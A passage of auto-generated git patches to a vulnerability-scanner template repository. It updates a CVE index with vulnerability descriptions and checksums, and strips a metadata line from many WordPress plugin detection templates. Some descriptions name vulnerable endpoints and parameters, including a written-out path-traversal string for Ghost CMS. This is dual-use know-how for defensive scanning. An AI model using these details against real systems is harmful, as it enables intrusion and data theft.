site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46169.yaml"} {"ID":"CVE-2022-46381","Info":{"Name":"Linear eMerge E3-Series - Cross-Site Scripting","Severity":"medium","Description":"Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46381.yaml"} {"ID":"CVE-2022-46888","Info":{"Name":"NexusPHP \u003c1.7.33 - Cross-Site Scripting","Severity":"medium","Description":"NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks..\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46888.yaml"} @@ -1899,6 +1900,7 @@ {"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"medium","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"} {"ID":"CVE-2023-32243","Info":{"Name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","Severity":"critical","Description":"Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32243.yaml"} {"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"} +{"ID":"CVE-2023-33439","Info":{"Name":"Faculty Evaluation System v1.0 - SQL Injection","Severity":"high","Description":"Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33439.yaml"} {"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"} {"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"} {"ID":"CVE-2023-34362","Info":{"Name":"MOVEit Transfer - Remote Code Execution","Severity":"critical","Description":"In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34362.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index ece42bdf4a..bc3de27f0f 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -4e9ea5be8a9b61669726b0fe75ee163e +4512d959add95e8cc8d761ec316e3dac From ac64cbd6320afcf3ad9f16e43298d11e04472d68 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 19:15:33 +0000 Subject: [PATCH 540/609] Auto Generated Templates Checksum [Sat Jul 8 19:15:33 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0765f0ba0c..4e2a10533d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2238,6 +2238,7 @@ http/cves/2022/CVE-2022-45835.yaml:5f4b590f00df7eff3055f62f3f7808905fec9129 http/cves/2022/CVE-2022-45917.yaml:0226b686f5fd79959cafe8ae966fd89d5a2dbce6 http/cves/2022/CVE-2022-45933.yaml:5e00a22a676d7eda5a57443146b560b0608a1975 http/cves/2022/CVE-2022-46020.yaml:ba3769558e37986e70e73ddd1577bdb353915229 +http/cves/2022/CVE-2022-46073.yaml:798bd5ab3d74675317798df7ca11834f20cbf3e3 http/cves/2022/CVE-2022-46169.yaml:562e09c425a29df8e43ffcb45dfcf005dd7c6767 http/cves/2022/CVE-2022-46381.yaml:ce9bf2978927607fd30ccf68be73583dfa5ea4c8 http/cves/2022/CVE-2022-46888.yaml:dd73682972669a956f087dfa462eb81947d562c2 @@ -3248,7 +3249,7 @@ http/exposed-panels/stridercd-panel.yaml:099616203a52687b85d16898c7127105d66ca23 http/exposed-panels/submitty-login.yaml:1c37ee3ec0ecaad6999d70aab9f9b849790e3ab2 http/exposed-panels/subrion-login.yaml:bc2fef03bd048cb66d4b0391797a586ee014f3e0 http/exposed-panels/sugarcrm-panel.yaml:4cce39ea3d3d5392df144c6339e237108675ce60 -http/exposed-panels/sunbird-dcim-panel.yaml:8e34c0028db7c29c09342340672ffb301f4f8e09 +http/exposed-panels/sunbird-dcim-panel.yaml:c4e2996410f93d68751d0d9d12fa5b46612ced4b http/exposed-panels/sungrow-logger1000-detect.yaml:774c8401adc0639a1ad0df8ab42180e515f0a57f http/exposed-panels/superadmin-ui-panel.yaml:3d5772eddb991f1bafa5e7531266d067e2aa0b48 http/exposed-panels/supermicro-bmc-panel.yaml:184070c4e6cccba884469692726043efde42472a @@ -6576,7 +6577,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:aa4a5683888622d7b8721de394b1850232066fef +templates-checksum.txt:9d73b0d12faadd8945da83c2d651d10835c87a4f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From fdb634b5aecd4da258d271baf12677f70a4e7b17 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 19:17:12 +0000 Subject: [PATCH 541/609] TemplateMan Update [Sat Jul 8 19:17:12 UTC 2023] :robot: --- http/cves/2022/CVE-2022-46073.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index e972f19203..33cd36ecec 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2022-46073 cwe-id: CWE-79 metadata: + max-request: 1 verified: true tags: cve,cve2022,xss,helmet-store-showroom From a676ce2234b72b47868c9a2c11bad99d31372b3d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jul 2023 04:02:05 +0000 Subject: [PATCH 542/609] Auto WordPress Plugins Update [Sun Jul 9 04:02:05 UTC 2023] :robot: --- helpers/wordpress/plugins/malcare-security.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/photo-gallery.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 3 +-- .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 202 files changed, 4 insertions(+), 204 deletions(-) diff --git a/helpers/wordpress/plugins/malcare-security.txt b/helpers/wordpress/plugins/malcare-security.txt index 65d265c76a..ecaabf10bd 100644 --- a/helpers/wordpress/plugins/malcare-security.txt +++ b/helpers/wordpress/plugins/malcare-security.txt @@ -1 +1 @@ -5.09 \ No newline at end of file +5.16 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index f7e6aaa8b0..cba37cb802 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.1.3 \ No newline at end of file +14.1.3.1 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- 